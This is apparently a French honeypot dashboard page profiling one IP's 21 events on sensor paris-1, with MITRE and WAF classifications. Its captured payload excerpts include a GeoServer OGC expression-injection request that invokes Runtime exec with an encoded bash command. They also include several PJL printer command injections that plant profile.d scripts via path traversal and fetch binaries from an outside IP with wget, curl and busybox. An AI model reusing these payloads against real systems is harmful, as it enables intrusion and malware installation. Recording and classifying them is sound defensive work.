Profil de menace
Activité suspecte — risque 42/100 (Moyen) — MITRE T1046 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Période analysée : 2026-07-14 → 2026-07-21
Activité suspecte — risque 42/100 (Moyen) — MITRE T1046 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Activité suspecte — risque 42/100 (Moyen) — MITRE T1046 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Tags WAF: sap-sapcontrol-path · confiance 100%
Confiance 100 % — Score WAF 20 · Bonus corrélation +12 · 1 tag(s) WAF
ASN 60064 · 192.142.24.0/21 · AFRINIC — 4 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 21 événements sur la période pour cette IP.
Même FAI Hostpalace Datacenters Ltd — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
21 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
21 événement(s) — page 1/1
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8443 · HTTPS | https | Sonde PostgreSQL postgres probe · via HTTPS:8443 · (sonde / probe) | Élevée | Faible · 35 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
HTTPS
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8443
Chemin / cible
—
Service
HTTPS
Payload
� ��r��� ōTg��w$W���B�Q7k��h� ,C�D�^��-{aS_�ji�0]q�DžބH �+�/�,�0̨̩� �� � c �
Pourquoi cette classification : Type « postgres_probe » (signaux protocolaires) · confiance 49%
Confiance classification
49%
Confiance modérée — signal unique
Risque capteur
Faible
· 35
Confiance : Confiance 49 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0369
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
PostgreSQL startup
STUN binding
Minecraft varint handshake
SOCKS5 greeting
SIP TLS ClientHello
TFTP RRQ
User-Agent
—
Règles WAF
—
Payload (extrait)
� ��r��� ōTg��w$W���B�Q7k��h� ,C�D�^��-{aS_�ji�0]q�DžބH �+�/�,�0̨̩� ��
� c �
Requête brute (extrait)
� ��r��� ōTg��w$W���B�Q7k��h� ,C�D�^��-{aS_�ji�0]q�DžބH �+�/�,�0̨̩� �� � c � ��� 2 + 3������G$پ+����D��&�7
|
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8080 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0
Émulateur
HTTP
WAF
3
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag sap-sapcontrol-path) · confiance 71%
Confiance classification
79%
Corrélation +8
Risque capteur
Moyen
· 40
Confiance : Confiance 71 % — Score WAF 20 · 1 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
Mozilla/5.0
Règles WAF
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 Connection: close |
|||||||
| TCP | 8888 · HTTP | http | Scan de ports port scan syn · via HTTP:8888 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0
Émulateur
HTTP
WAF
3
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Tags WAF: sap-sapcontrol-path · confiance 100%
Confiance classification
100%
Corrélation +12
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 1 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
HTTP alt 8888 probe
Ligne de requête
User-Agent
Mozilla/5.0
Règles WAF
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8888 User-Agent: Mozilla/5.0 Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:8080 · (tentative d'exploit) · → /geoserver/ows | Élevée | Moyen · 63 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1190
TA0001
TA0002
Protocole
GET /geoserver/ows UA Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Émulateur
HTTP
WAF
42
Recommandation
Investiguer
Tags
Cible HTTP
GET
/geoserver/ows
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/geoserver/ows
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 63
Confiance : Confiance 100 % — 6 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
T1190
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Règles WAF
rce-0
rce-3
nosqli-3
php-rce-passthru
Payload (extrait)
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetPropertyValue&typeName=sf%3Aarchsites&valueReference=exec%28java.lang.Ru
Requête brute (extrait)
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetPropertyValue&typeName=sf%3Aarchsites&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%27bash+-c+%7Becho%2CY2htb2QgK3ggL3Vzci9iaW4vY3VybDsgY2htb2QgK3ggL3Vzci9iaW4vd2dldDsgY2QgL3RtcHx8Y2QgL3 |
|||||||
| TCP | 8080 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8080 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
HTTP
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8080
Chemin / cible
—
Service
HTTP
Pourquoi cette classification : Type « web_probe » (signaux protocolaires) · confiance 74%
Confiance classification
74%
Risque capteur
Moyen
· 40
Confiance : Confiance 74 % — Score WAF 8
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
|
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | jetdirect jetdirect · via JETDIRECT:9100 · (sonde / probe) | Faible | Faible · 0 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Pourquoi cette classification : Type « jetdirect » (signaux protocolaires) · confiance 0%
Confiance classification
0%
Risque capteur
Faible
· 0
Confiance : Confiance faible (0 %) — classification prudente
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
|
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | Injection de commande cmd injection · via JETDIRECT:9100 · (tentative d'exploit) | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=811 NAME="0:/../../rw/var/etc/profile.d/ysXTkBNI
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
ET path traversal encoded
CRS 930110
CRS 932205
LFI Path traversal encoded
LFI Double-dot bypass
RFC NTP mode 3
User-Agent
—
Règles WAF
—
Payload (extrait)
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=811 NAME="0:/../../rw/var/etc/profile.d/ysXTkBNI
Requête brute (extrait)
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=811 NAME="0:/../../rw/var/etc/profile.d/ysXTkBNI.sh" #!/bin/sh (cd /tmp||cd /var/run||cd /dev/shm||cd /;wget -q -O r http://166.0.192.57/routereater 2>/dev/null||busybox wget |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | jetdirect jetdirect · via JETDIRECT:9100 · (sonde / probe) | Faible | Faible · 6 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
PRT2 �����������������������������������������������������������������������������������������������������������������������
Pourquoi cette classification : Type « jetdirect » (signaux protocolaires) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Faible
· 6
Confiance : Confiance 50 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0554
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
PRT2 �����������������������������������������������������������������������������������������������������������������������
Requête brute (extrait)
PRT2 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | Injection de commande cmd injection · via JETDIRECT:9100 · (tentative d'exploit) | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
%-12345X@PJL JOB @PJL EXEC +sh -c "(cd /tmp||cd /var/run||cd /dev/shm||cd /;wget -q -O r http://166.0.192.57/routereater 2>/de
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932205
LFI Double-dot bypass
RFC NTP mode 3
User-Agent
—
Règles WAF
—
Payload (extrait)
%-12345X@PJL JOB @PJL EXEC +sh -c "(cd /tmp||cd /var/run||cd /dev/shm||cd /;wget -q -O r http://166.0.192.57/routereater 2>/de
Requête brute (extrait)
%-12345X@PJL JOB @PJL EXEC +sh -c "(cd /tmp||cd /var/run||cd /dev/shm||cd /;wget -q -O r http://166.0.192.57/routereater 2>/dev/null||busybox wget -q -O r http://166.0.192.57/routereater 2>/dev/null||curl -fsSL -o r http://166.0.192.57/routereater 2>/dev |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | jetdirect jetdirect · via JETDIRECT:9100 · (sonde / probe) | Faible | Faible · 6 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
PRT2 �����������������������������������������������������������������������������������������������������������������������
Pourquoi cette classification : Type « jetdirect » (signaux protocolaires) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Faible
· 6
Confiance : Confiance 50 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0554
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
PRT2 �����������������������������������������������������������������������������������������������������������������������
Requête brute (extrait)
PRT2 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | Injection de commande cmd injection · via JETDIRECT:9100 · (tentative d'exploit) | Faible | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||c
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932205
LFI Double-dot bypass
RFC NTP mode 3
User-Agent
—
Règles WAF
—
Payload (extrait)
%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||c
Requête brute (extrait)
%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||cd /; wget -q --tries=3 --timeout=10 -O cumshotnews http://166.0.192.57/cumshotnews; curl -fsSL --connect-timeout 10 -o cumshotne |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | jetdirect jetdirect · via JETDIRECT:9100 · (sonde / probe) | Faible | Faible · 0 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Pourquoi cette classification : Type « jetdirect » (signaux protocolaires) · confiance 0%
Confiance classification
0%
Risque capteur
Faible
· 0
Confiance : Confiance faible (0 %) — classification prudente
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
|
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | Injection de commande cmd injection · via JETDIRECT:9100 · (tentative d'exploit) | Faible | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/WdhgujQV
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
ET path traversal encoded
CRS 930110
CRS 932205
LFI Path traversal encoded
RFC NTP mode 3
User-Agent
—
Règles WAF
—
Payload (extrait)
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/WdhgujQV
Requête brute (extrait)
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/WdhgujQV.sh" #!/bin/sh (chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||cd /; wget -q --tries= |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | jetdirect jetdirect · via JETDIRECT:9100 · (sonde / probe) | Faible | Faible · 0 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Pourquoi cette classification : Type « jetdirect » (signaux protocolaires) · confiance 0%
Confiance classification
0%
Risque capteur
Faible
· 0
Confiance : Confiance faible (0 %) — classification prudente
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
|
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | Injection de commande cmd injection · via JETDIRECT:9100 · (tentative d'exploit) | Faible | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/YXPLBcdh
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
ET path traversal encoded
CRS 930110
CRS 932205
LFI Path traversal encoded
RFC NTP mode 3
User-Agent
—
Règles WAF
—
Payload (extrait)
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/YXPLBcdh
Requête brute (extrait)
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/YXPLBcdh.sh" #!/bin/sh (chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||cd /; wget -q --tries= |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | jetdirect jetdirect · via JETDIRECT:9100 · (sonde / probe) | Faible | Faible · 6 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
PRT2 �����������������������������������������������������������������������������������������������������������������������
Pourquoi cette classification : Type « jetdirect » (signaux protocolaires) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Faible
· 6
Confiance : Confiance 50 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0554
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
PRT2 �����������������������������������������������������������������������������������������������������������������������
Requête brute (extrait)
PRT2 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | Injection de commande cmd injection · via JETDIRECT:9100 · (tentative d'exploit) | Faible | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||c
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932205
LFI Double-dot bypass
RFC NTP mode 3
User-Agent
—
Règles WAF
—
Payload (extrait)
%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||c
Requête brute (extrait)
%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||cd /; wget -q --tries=3 --timeout=10 -O cumshotnews http://166.0.192.57/cumshotnews; curl -fsSL --connect-timeout 10 -o cumshotne |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | jetdirect jetdirect · via JETDIRECT:9100 · (sonde / probe) | Faible | Faible · 0 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Pourquoi cette classification : Type « jetdirect » (signaux protocolaires) · confiance 0%
Confiance classification
0%
Risque capteur
Faible
· 0
Confiance : Confiance faible (0 %) — classification prudente
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
|
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | Injection de commande cmd injection · via JETDIRECT:9100 · (tentative d'exploit) | Faible | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/dUfOTXPl
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
ET path traversal encoded
CRS 930110
CRS 932205
LFI Path traversal encoded
RFC NTP mode 3
User-Agent
—
Règles WAF
—
Payload (extrait)
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/dUfOTXPl
Requête brute (extrait)
%-12345X@PJL JOB @PJL FSINIT VOLUME="0:/" @PJL FSDOWNLOAD FORMAT:BINARY SIZE=358 NAME="0:/../../rw/var/etc/profile.d/dUfOTXPl.sh" #!/bin/sh (chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||cd /; wget -q --tries= |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | jetdirect jetdirect · via JETDIRECT:9100 · (sonde / probe) | Faible | Faible · 6 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
PRT2 �����������������������������������������������������������������������������������������������������������������������
Pourquoi cette classification : Type « jetdirect » (signaux protocolaires) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Faible
· 6
Confiance : Confiance 50 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0554
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
PRT2 �����������������������������������������������������������������������������������������������������������������������
Requête brute (extrait)
PRT2 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� |
|||||||
| TCP | 9100 · JETDIRECT | jetdirect | Injection de commande cmd injection · via JETDIRECT:9100 · (tentative d'exploit) | Faible | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
Émulateur
JETDIRECT
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9100
Chemin / cible
—
Service
JETDIRECT
Payload
%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||c
Pourquoi cette classification : Type « cmd_injection » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932205
LFI Double-dot bypass
RFC NTP mode 3
User-Agent
—
Règles WAF
—
Payload (extrait)
%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||c
Requête brute (extrait)
